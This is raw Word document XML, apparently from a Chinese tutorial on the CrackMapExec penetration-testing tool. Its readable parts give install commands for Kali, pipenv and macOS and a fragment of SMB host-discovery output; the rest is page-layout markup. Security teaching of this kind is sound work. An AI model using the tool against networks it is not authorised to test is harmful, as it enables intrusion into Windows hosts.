          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-43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Wiki：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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ali：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apt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get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install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crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="33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但作者推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pipenv安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>装：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="15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apt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get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install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libssl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dev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libffi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dev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python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dev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build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essential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pip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install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‐‐user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pipenv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1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git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clone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‐‐recursive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https://github.com/byt3bl33d3r/CrackMapExec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CrackMapExec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&amp;&amp;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pipenv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install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pipenv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shell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python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setup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install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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OSX：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pip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install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‐‐user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crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="31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默认为100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线程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.0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24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PC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Ultimate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7601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Pack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name:JOHN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domain:JOHN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SMBv1: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3790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Pack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name:WIN03X64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domain:WIN03X64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SMBv1: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91.500pt;width:0.500pt;height:485.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1830" coordsize="10,9710">
        <v:shape style="position:absolute;left:10390;top:1830;width:10;height:9710" coordorigin="10390,1830" coordsize="10,9710" path="m10402,1840l10402,1840,10402,1840,10402,1840,10402,1840,10402,1840,10402,1841,10402,1841,10402,1842,10402,1843,10402,1844,10402,1846,10402,1848,10402,1850,10402,1853,10402,1856,10402,1859,10402,1864,10402,1868,10402,1874,10402,1879,10402,1886,10402,1893,10402,1901,10402,1910,10402,1920,10402,1930,10402,1941,10402,1953,10402,1966,10402,1980,10402,1995,10402,2012,10402,2029,10402,2047,10402,2066,10402,2087,10402,2109,10402,2132,10402,2156,10402,2182,10402,2209,10402,2237,10402,2267,10402,2298,10402,2331,10402,2365,10402,2401,10402,2438,10402,2477,10402,2518,10402,2560,10402,2604,10402,2650,10402,2698,10402,2747,10402,2799,10402,2852,10402,2907,10402,2964,10402,3023,10402,3085,10402,3148,10402,3213,10402,3281,10402,3350,10402,3422,10402,3496,10402,3573,10402,3652,10402,3733,10402,3816,10402,3902,10402,3991,10402,4081,10402,4175,10402,4271,10402,4369,10402,4470,10402,4574,10402,4681,10402,4790,10402,4902,10402,5017,10402,5135,10402,5255,10402,5379,10402,5505,10402,5634,10402,5767,10402,5902,10402,6040,10402,6182,10402,6327,10402,6475,10402,6626,10402,6780,10402,6938,10402,7099,10402,7263,10402,7431,10402,7602,10402,7777,10402,7955,10402,8136,10402,8321,10402,8510,10402,8703,10402,8899,10402,9098,10402,9302,10402,9509,10402,9720,10402,9935,10402,10154,10402,10377,10402,10603,10402,10834,10402,11068,10402,11307,10402,11550e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:91.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1830" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:1830;width:8990;height:670" coordorigin="1490,1830" coordsize="8990,670" path="m1510,1840l1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1511,1840,1512,1840,1512,1840,1514,1840,1515,1840,1517,1840,1519,1840,1521,1840,1524,1840,1528,1840,1532,1840,1536,1840,1541,1840,1546,1840,1552,1840,1559,1840,1566,1840,1575,1840,1583,1840,1593,1840,1603,1840,1615,1840,1627,1840,1640,1840,1654,1840,1668,1840,1684,1840,1701,1840,1719,1840,1738,1840,1758,1840,1780,1840,1802,1840,1826,1840,1851,1840,1877,1840,1904,1840,1933,1840,1963,1840,1995,1840,2028,1840,2063,1840,2099,1840,2136,1840,2175,1840,2216,1840,2259,1840,2303,1840,2348,1840,2396,1840,2445,1840,2496,1840,2549,1840,2604,1840,2660,1840,2719,1840,2779,1840,2841,1840,2906,1840,2972,1840,3041,1840,3112,1840,3184,1840,3259,1840,3336,1840,3416,1840,3498,1840,3582,1840,3668,1840,3757,1840,3848,1840,3941,1840,4037,1840,4136,1840,4236,1840,4340,1840,4446,1840,4555,1840,4666,1840,4780,1840,4897,1840,5017,1840,5139,1840,5264,1840,5392,1840,5523,1840,5657,1840,5793,1840,5933,1840,6076,1840,6222,1840,6370,1840,6522,1840,6677,1840,6835,1840,6997,1840,7161,1840,7329,1840,7500,1840,7675,1840,7853,1840,8034,1840,8219,1840,8407,1840,8598,1840,8793,1840,8992,1840,9194,1840,9400,1840,9609,1840,9823,1840,10039,1840,10260,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1841,10484,1841,10484,1841,10484,1841,10484,1842,10484,1842,10484,1842,10484,1843,10484,1843,10484,1844,10484,1844,10484,1845,10484,1845,10484,1846,10484,1847,10484,1848,10484,1849,10484,1849,10484,1851,10484,1852,10484,1853,10484,1854,10484,1855,10484,1857,10484,1858,10484,1860,10484,1861,10484,1863,10484,1865,10484,1867,10484,1869,10484,1871,10484,1873,10484,1876,10484,1878,10484,1881,10484,1883,10484,1886,10484,1889,10484,1892,10484,1895,10484,1898,10484,1902,10484,1905,10484,1909,10484,1912,10484,1916,10484,1920,10484,1925,10484,1929,10484,1933,10484,1938,10484,1943,10484,1948,10484,1953,10484,1958,10484,1963,10484,1969,10484,1974,10484,1980,10484,1986,10484,1992,10484,1999,10484,2005,10484,2012,10484,2019,10484,2026,10484,2033,10484,2041,10484,2048,10484,2056,10484,2064,10484,2072,10484,2081,10484,2089,10484,2098,10484,2107,10484,2116,10484,2126,10484,2135,10484,2145,10484,2155,10484,2165,10484,2176,10484,2187,10484,2198,10484,2209,10484,2220,10484,2232,10484,2244,10484,2256,10484,2268,10484,2281,10484,2294,10484,2307,10484,2320,10484,2334,10484,2347,10484,2361,10484,2376,10484,2390,10484,2405,10484,2420,10484,2436,10484,2452,10484,2468,10484,2484,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10483,2500,10482,2500,10482,2500,10480,2500,10479,2500,10477,2500,10475,2500,10473,2500,10470,2500,10466,2500,10462,2500,10458,2500,10453,2500,10448,2500,10442,2500,10435,2500,10428,2500,10419,2500,10411,2500,10401,2500,10391,2500,10379,2500,10367,2500,10354,2500,10340,2500,10326,2500,10310,2500,10293,2500,10275,2500,10256,2500,10236,2500,10215,2500,10192,2500,10168,2500,10143,2500,10117,2500,10090,2500,10061,2500,10031,2500,9999,2500,9966,2500,9931,2500,9895,2500,9858,2500,9819,2500,9778,2500,9735,2500,9691,2500,9646,2500,9598,2500,9549,2500,9498,2500,9445,2500,9391,2500,9334,2500,9275,2500,9215,2500,9153,2500,9088,2500,9022,2500,8953,2500,8883,2500,8810,2500,8735,2500,8658,2500,8578,2500,8497,2500,8413,2500,8326,2500,8238,2500,8146,2500,8053,2500,7957,2500,7859,2500,7758,2500,7654,2500,7548,2500,7439,2500,7328,2500,7214,2500,7097,2500,6977,2500,6855,2500,6730,2500,6602,2500,6471,2500,6337,2500,6201,2500,6061,2500,5918,2500,5773,2500,5624,2500,5472,2500,5317,2500,5159,2500,4997,2500,4833,2500,4665,2500,4494,2500,4319,2500,4141,2500,3960,2500,3776,2500,3587,2500,3396,2500,3201,2500,3002,2500,2800,2500,2594,2500,2385,2500,2172,2500,1955,2500,1734,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2499,1510,2499,1510,2499,1510,2499,1510,2498,1510,2498,1510,2498,1510,2497,1510,2497,1510,2496,1510,2495,1510,2495,1510,2494,1510,2493,1510,2493,1510,2492,1510,2491,1510,2490,1510,2489,1510,2487,1510,2486,1510,2485,1510,2483,1510,2482,1510,2480,1510,2479,1510,2477,1510,2475,1510,2473,1510,2471,1510,2469,1510,2467,1510,2465,1510,2462,1510,2460,1510,2457,1510,2454,1510,2451,1510,2448,1510,2445,1510,2442,1510,2439,1510,2435,1510,2431,1510,2428,1510,2424,1510,2420,1510,2416,1510,2411,1510,2407,1510,2402,1510,2398,1510,2393,1510,2388,1510,2382,1510,2377,1510,2372,1510,2366,1510,2360,1510,2354,1510,2348,1510,2341,1510,2335,1510,2328,1510,2321,1510,2314,1510,2307,1510,2300,1510,2292,1510,2284,1510,2276,1510,2268,1510,2260,1510,2251,1510,2242,1510,2233,1510,2224,1510,2215,1510,2205,1510,2195,1510,2185,1510,2175,1510,2164,1510,2154,1510,2143,1510,2131,1510,2120,1510,2108,1510,2097,1510,2084,1510,2072,1510,2059,1510,2047,1510,2034,1510,2020,1510,2007,1510,1993,1510,1979,1510,1964,1510,1950,1510,1935,1510,1920,1510,1904,1510,1889,1510,1873,1510,1856,1510,1840e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:90.599pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:124.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2490" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:2490;width:8990;height:630" coordorigin="1490,2490" coordsize="8990,630" path="m1510,2500l1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1511,2500,1512,2500,1512,2500,1514,2500,1515,2500,1517,2500,1519,2500,1521,2500,1524,2500,1528,2500,1532,2500,1536,2500,1541,2500,1546,2500,1552,2500,1559,2500,1566,2500,1575,2500,1583,2500,1593,2500,1603,2500,1615,2500,1627,2500,1640,2500,1654,2500,1668,2500,1684,2500,1701,2500,1719,2500,1738,2500,1758,2500,1780,2500,1802,2500,1826,2500,1851,2500,1877,2500,1904,2500,1933,2500,1963,2500,1995,2500,2028,2500,2063,2500,2099,2500,2136,2500,2175,2500,2216,2500,2259,2500,2303,2500,2348,2500,2396,2500,2445,2500,2496,2500,2549,2500,2604,2500,2660,2500,2719,2500,2779,2500,2841,2500,2906,2500,2972,2500,3041,2500,3112,2500,3184,2500,3259,2500,3336,2500,3416,2500,3498,2500,3582,2500,3668,2500,3757,2500,3848,2500,3941,2500,4037,2500,4136,2500,4236,2500,4340,2500,4446,2500,4555,2500,4666,2500,4780,2500,4897,2500,5017,2500,5139,2500,5264,2500,5392,2500,5523,2500,5657,2500,5793,2500,5933,2500,6076,2500,6222,2500,6370,2500,6522,2500,6677,2500,6835,2500,6997,2500,7161,2500,7329,2500,7500,2500,7675,2500,7853,2500,8034,2500,8219,2500,8407,2500,8598,2500,8793,2500,8992,2500,9194,2500,9400,2500,9609,2500,9823,2500,10039,2500,10260,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2501,10484,2501,10484,2501,10484,2501,10484,2501,10484,2501,10484,2502,10484,2502,10484,2502,10484,2502,10484,2503,10484,2503,10484,2504,10484,2504,10484,2505,10484,2505,10484,2506,10484,2507,10484,2508,10484,2508,10484,2509,10484,2510,10484,2511,10484,2513,10484,2514,10484,2515,10484,2516,10484,2518,10484,2519,10484,2521,10484,2522,10484,2524,10484,2526,10484,2528,10484,2530,10484,2532,10484,2534,10484,2537,10484,2539,10484,2542,10484,2544,10484,2547,10484,2550,10484,2553,10484,2556,10484,2559,10484,2562,10484,2566,10484,2570,10484,2573,10484,2577,10484,2581,10484,2585,10484,2589,10484,2594,10484,2598,10484,2603,10484,2608,10484,2613,10484,2618,10484,2623,10484,2629,10484,2634,10484,2640,10484,2646,10484,2652,10484,2658,10484,2664,10484,2671,10484,2678,10484,2685,10484,2692,10484,2699,10484,2706,10484,2714,10484,2722,10484,2730,10484,2738,10484,2747,10484,2755,10484,2764,10484,2773,10484,2782,10484,2792,10484,2801,10484,2811,10484,2821,10484,2831,10484,2842,10484,2852,10484,2863,10484,2874,10484,2886,10484,2897,10484,2909,10484,2921,10484,2933,10484,2946,10484,2958,10484,2971,10484,2985,10484,2998,10484,3012,10484,3026,10484,3040,10484,3054,10484,3069,10484,3084,10484,3099,10484,3115,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10483,3131,10482,3131,10482,3131,10480,3131,10479,3131,10477,3131,10475,3131,10473,3131,10470,3131,10466,3131,10462,3131,10458,3131,10453,3131,10448,3131,10442,3131,10435,3131,10428,3131,10419,3131,10411,3131,10401,3131,10391,3131,10379,3131,10367,3131,10354,3131,10340,3131,10326,3131,10310,3131,10293,3131,10275,3131,10256,3131,10236,3131,10215,3131,10192,3131,10168,3131,10143,3131,10117,3131,10090,3131,10061,3131,10031,3131,9999,3131,9966,3131,9931,3131,9895,3131,9858,3131,9819,3131,9778,3131,9735,3131,9691,3131,9646,3131,9598,3131,9549,3131,9498,3131,9445,3131,9391,3131,9334,3131,9275,3131,9215,3131,9153,3131,9088,3131,9022,3131,8953,3131,8883,3131,8810,3131,8735,3131,8658,3131,8578,3131,8497,3131,8413,3131,8326,3131,8238,3131,8146,3131,8053,3131,7957,3131,7859,3131,7758,3131,7654,3131,7548,3131,7439,3131,7328,3131,7214,3131,7097,3131,6977,3131,6855,3131,6730,3131,6602,3131,6471,3131,6337,3131,6201,3131,6061,3131,5918,3131,5773,3131,5624,3131,5472,3131,5317,3131,5159,3131,4997,3131,4833,3131,4665,3131,4494,3131,4319,3131,4141,3131,3960,3131,3776,3131,3587,3131,3396,3131,3201,3131,3002,3131,2800,3131,2594,3131,2385,3131,2172,3131,1955,3131,1734,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3129,1510,3129,1510,3129,1510,3128,1510,3128,1510,3128,1510,3127,1510,3127,1510,3126,1510,3125,1510,3125,1510,3124,1510,3123,1510,3122,1510,3121,1510,3120,1510,3119,1510,3118,1510,3117,1510,3116,1510,3115,1510,3113,1510,3112,1510,3110,1510,3108,1510,3107,1510,3105,1510,3103,1510,3101,1510,3099,1510,3096,1510,3094,1510,3092,1510,3089,1510,3087,1510,3084,1510,3081,1510,3078,1510,3075,1510,3072,1510,3068,1510,3065,1510,3061,1510,3058,1510,3054,1510,3050,1510,3046,1510,3041,1510,3037,1510,3033,1510,3028,1510,3023,1510,3018,1510,3013,1510,3008,1510,3002,1510,2997,1510,2991,1510,2985,1510,2979,1510,2973,1510,2966,1510,2960,1510,2953,1510,2946,1510,2939,1510,2932,1510,2924,1510,2917,1510,2909,1510,2901,1510,2893,1510,2884,1510,2876,1510,2867,1510,2858,1510,2849,1510,2839,1510,2830,1510,2820,1510,2810,1510,2800,1510,2789,1510,2779,1510,2768,1510,2757,1510,2745,1510,2734,1510,2722,1510,2710,1510,2698,1510,2685,1510,2672,1510,2659,1510,2646,1510,2633,1510,2619,1510,2605,1510,2591,1510,2576,1510,2562,1510,2547,1510,2532,1510,2516,1510,2500e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:124.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2490" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:2490;width:30;height:630" coordorigin="1490,2490" coordsize="30,630" path="m1517,2500l1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2501,1517,2501,1517,2501,1517,2501,1517,2501,1517,2501,1517,2502,1517,2502,1517,2502,1517,2502,1517,2503,1517,2503,1517,2504,1517,2504,1517,2505,1517,2505,1517,2506,1517,2507,1517,2508,1517,2508,1517,2509,1517,2510,1517,2511,1517,2513,1517,2514,1517,2515,1517,2516,1517,2518,1517,2519,1517,2521,1517,2522,1517,2524,1517,2526,1517,2528,1517,2530,1517,2532,1517,2534,1517,2537,1517,2539,1517,2542,1517,2544,1517,2547,1517,2550,1517,2553,1517,2556,1517,2559,1517,2562,1517,2566,1517,2570,1517,2573,1517,2577,1517,2581,1517,2585,1517,2589,1517,2594,1517,2598,1517,2603,1517,2608,1517,2613,1517,2618,1517,2623,1517,2629,1517,2634,1517,2640,1517,2646,1517,2652,1517,2658,1517,2664,1517,2671,1517,2678,1517,2685,1517,2692,1517,2699,1517,2706,1517,2714,1517,2722,1517,2730,1517,2738,1517,2747,1517,2755,1517,2764,1517,2773,1517,2782,1517,2792,1517,2801,1517,2811,1517,2821,1517,2831,1517,2842,1517,2852,1517,2863,1517,2874,1517,2886,1517,2897,1517,2909,1517,2921,1517,2933,1517,2946,1517,2958,1517,2971,1517,2985,1517,2998,1517,3012,1517,3026,1517,3040,1517,3054,1517,3069,1517,3084,1517,3099,1517,3115,1517,3131e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:155.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3110" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:3110;width:8990;height:650" coordorigin="1490,3110" coordsize="8990,650" path="m1510,3131l1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1511,3131,1512,3131,1512,3131,1514,3131,1515,3131,1517,3131,1519,3131,1521,3131,1524,3131,1528,3131,1532,3131,1536,3131,1541,3131,1546,3131,1552,3131,1559,3131,1566,3131,1575,3131,1583,3131,1593,3131,1603,3131,1615,3131,1627,3131,1640,3131,1654,3131,1668,3131,1684,3131,1701,3131,1719,3131,1738,3131,1758,3131,1780,3131,1802,3131,1826,3131,1851,3131,1877,3131,1904,3131,1933,3131,1963,3131,1995,3131,2028,3131,2063,3131,2099,3131,2136,3131,2175,3131,2216,3131,2259,3131,2303,3131,2348,3131,2396,3131,2445,3131,2496,3131,2549,3131,2604,3131,2660,3131,2719,3131,2779,3131,2841,3131,2906,3131,2972,3131,3041,3131,3112,3131,3184,3131,3259,3131,3336,3131,3416,3131,3498,3131,3582,3131,3668,3131,3757,3131,3848,3131,3941,3131,4037,3131,4136,3131,4236,3131,4340,3131,4446,3131,4555,3131,4666,3131,4780,3131,4897,3131,5017,3131,5139,3131,5264,3131,5392,3131,5523,3131,5657,3131,5793,3131,5933,3131,6076,3131,6222,3131,6370,3131,6522,3131,6677,3131,6835,3131,6997,3131,7161,3131,7329,3131,7500,3131,7675,3131,7853,3131,8034,3131,8219,3131,8407,3131,8598,3131,8793,3131,8992,3131,9194,3131,9400,3131,9609,3131,9823,3131,10039,3131,10260,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3132,10484,3132,10484,3132,10484,3132,10484,3133,10484,3133,10484,3134,10484,3134,10484,3135,10484,3135,10484,3136,10484,3137,10484,3137,10484,3138,10484,3139,10484,3140,10484,3141,10484,3142,10484,3143,10484,3144,10484,3146,10484,3147,10484,3148,10484,3150,10484,3152,10484,3153,10484,3155,10484,3157,10484,3159,10484,3161,10484,3163,10484,3165,10484,3168,10484,3170,10484,3173,10484,3176,10484,3178,10484,3181,10484,3184,10484,3188,10484,3191,10484,3194,10484,3198,10484,3201,10484,3205,10484,3209,10484,3213,10484,3217,10484,3222,10484,3226,10484,3231,10484,3236,10484,3241,10484,3246,10484,3251,10484,3256,10484,3262,10484,3268,10484,3274,10484,3280,10484,3286,10484,3292,10484,3299,10484,3305,10484,3312,10484,3319,10484,3327,10484,3334,10484,3342,10484,3350,10484,3358,10484,3366,10484,3374,10484,3383,10484,3392,10484,3401,10484,3410,10484,3419,10484,3429,10484,3439,10484,3449,10484,3459,10484,3469,10484,3480,10484,3491,10484,3502,10484,3514,10484,3525,10484,3537,10484,3549,10484,3561,10484,3574,10484,3587,10484,3600,10484,3613,10484,3627,10484,3640,10484,3654,10484,3669,10484,3683,10484,3698,10484,3713,10484,3728,10484,3744,10484,3760,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10483,3776,10482,3776,10482,3776,10480,3776,10479,3776,10477,3776,10475,3776,10473,3776,10470,3776,10466,3776,10462,3776,10458,3776,10453,3776,10448,3776,10442,3776,10435,3776,10428,3776,10419,3776,10411,3776,10401,3776,10391,3776,10379,3776,10367,3776,10354,3776,10340,3776,10326,3776,10310,3776,10293,3776,10275,3776,10256,3776,10236,3776,10215,3776,10192,3776,10168,3776,10143,3776,10117,3776,10090,3776,10061,3776,10031,3776,9999,3776,9966,3776,9931,3776,9895,3776,9858,3776,9819,3776,9778,3776,9735,3776,9691,3776,9646,3776,9598,3776,9549,3776,9498,3776,9445,3776,9391,3776,9334,3776,9275,3776,9215,3776,9153,3776,9088,3776,9022,3776,8953,3776,8883,3776,8810,3776,8735,3776,8658,3776,8578,3776,8497,3776,8413,3776,8326,3776,8238,3776,8146,3776,8053,3776,7957,3776,7859,3776,7758,3776,7654,3776,7548,3776,7439,3776,7328,3776,7214,3776,7097,3776,6977,3776,6855,3776,6730,3776,6602,3776,6471,3776,6337,3776,6201,3776,6061,3776,5918,3776,5773,3776,5624,3776,5472,3776,5317,3776,5159,3776,4997,3776,4833,3776,4665,3776,4494,3776,4319,3776,4141,3776,3960,3776,3776,3776,3587,3776,3396,3776,3201,3776,3002,3776,2800,3776,2594,3776,2385,3776,2172,3776,1955,3776,1734,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3775,1510,3775,1510,3775,1510,3775,1510,3775,1510,3774,1510,3774,1510,3774,1510,3773,1510,3773,1510,3772,1510,3772,1510,3771,1510,3771,1510,3770,1510,3769,1510,3768,1510,3767,1510,3767,1510,3766,1510,3764,1510,3763,1510,3762,1510,3761,1510,3759,1510,3758,1510,3757,1510,3755,1510,3753,1510,3751,1510,3750,1510,3748,1510,3745,1510,3743,1510,3741,1510,3739,1510,3736,1510,3734,1510,3731,1510,3728,1510,3725,1510,3722,1510,3719,1510,3716,1510,3712,1510,3709,1510,3705,1510,3701,1510,3697,1510,3693,1510,3689,1510,3685,1510,3680,1510,3676,1510,3671,1510,3666,1510,3661,1510,3655,1510,3650,1510,3645,1510,3639,1510,3633,1510,3627,1510,3621,1510,3614,1510,3608,1510,3601,1510,3594,1510,3587,1510,3580,1510,3572,1510,3565,1510,3557,1510,3549,1510,3541,1510,3532,1510,3524,1510,3515,1510,3506,1510,3497,1510,3487,1510,3478,1510,3468,1510,3458,1510,3448,1510,3437,1510,3426,1510,3415,1510,3404,1510,3393,1510,3381,1510,3370,1510,3357,1510,3345,1510,3333,1510,3320,1510,3307,1510,3293,1510,3280,1510,3266,1510,3252,1510,3238,1510,3223,1510,3209,1510,3193,1510,3178,1510,3163,1510,3147,1510,3131e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:155.500pt;width:1.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3110" coordsize="30,670">
        <v:shape style="position:absolute;left:1490;top:3110;width:30;height:670" coordorigin="1490,3110" coordsize="30,670" path="m1517,3131l1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3131,1517,3132,1517,3132,1517,3132,1517,3132,1517,3133,1517,3133,1517,3134,1517,3134,1517,3135,1517,3135,1517,3136,1517,3137,1517,3137,1517,3138,1517,3139,1517,3140,1517,3141,1517,3142,1517,3143,1517,3144,1517,3146,1517,3147,1517,3148,1517,3150,1517,3152,1517,3153,1517,3155,1517,3157,1517,3159,1517,3161,1517,3163,1517,3165,1517,3168,1517,3170,1517,3173,1517,3176,1517,3178,1517,3181,1517,3184,1517,3188,1517,3191,1517,3194,1517,3198,1517,3201,1517,3205,1517,3209,1517,3213,1517,3217,1517,3222,1517,3226,1517,3231,1517,3236,1517,3241,1517,3246,1517,3251,1517,3256,1517,3262,1517,3268,1517,3274,1517,3280,1517,3286,1517,3292,1517,3299,1517,3305,1517,3312,1517,3319,1517,3327,1517,3334,1517,3342,1517,3350,1517,3358,1517,3366,1517,3374,1517,3383,1517,3392,1517,3401,1517,3410,1517,3419,1517,3429,1517,3439,1517,3449,1517,3459,1517,3469,1517,3480,1517,3491,1517,3502,1517,3514,1517,3525,1517,3537,1517,3549,1517,3561,1517,3574,1517,3587,1517,3600,1517,3613,1517,3627,1517,3640,1517,3654,1517,3669,1517,3683,1517,3698,1517,3713,1517,3728,1517,3744,1517,3760,1517,3776e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:187.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3750" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:3750;width:8990;height:650" coordorigin="1490,3750" coordsize="8990,650" path="m1510,3776l1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1511,3776,1512,3776,1512,3776,1514,3776,1515,3776,1517,3776,1519,3776,1521,3776,1524,3776,1528,3776,1532,3776,1536,3776,1541,3776,1546,3776,1552,3776,1559,3776,1566,3776,1575,3776,1583,3776,1593,3776,1603,3776,1615,3776,1627,3776,1640,3776,1654,3776,1668,3776,1684,3776,1701,3776,1719,3776,1738,3776,1758,3776,1780,3776,1802,3776,1826,3776,1851,3776,1877,3776,1904,3776,1933,3776,1963,3776,1995,3776,2028,3776,2063,3776,2099,3776,2136,3776,2175,3776,2216,3776,2259,3776,2303,3776,2348,3776,2396,3776,2445,3776,2496,3776,2549,3776,2604,3776,2660,3776,2719,3776,2779,3776,2841,3776,2906,3776,2972,3776,3041,3776,3112,3776,3184,3776,3259,3776,3336,3776,3416,3776,3498,3776,3582,3776,3668,3776,3757,3776,3848,3776,3941,3776,4037,3776,4136,3776,4236,3776,4340,3776,4446,3776,4555,3776,4666,3776,4780,3776,4897,3776,5017,3776,5139,3776,5264,3776,5392,3776,5523,3776,5657,3776,5793,3776,5933,3776,6076,3776,6222,3776,6370,3776,6522,3776,6677,3776,6835,3776,6997,3776,7161,3776,7329,3776,7500,3776,7675,3776,7853,3776,8034,3776,8219,3776,8407,3776,8598,3776,8793,3776,8992,3776,9194,3776,9400,3776,9609,3776,9823,3776,10039,3776,10260,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776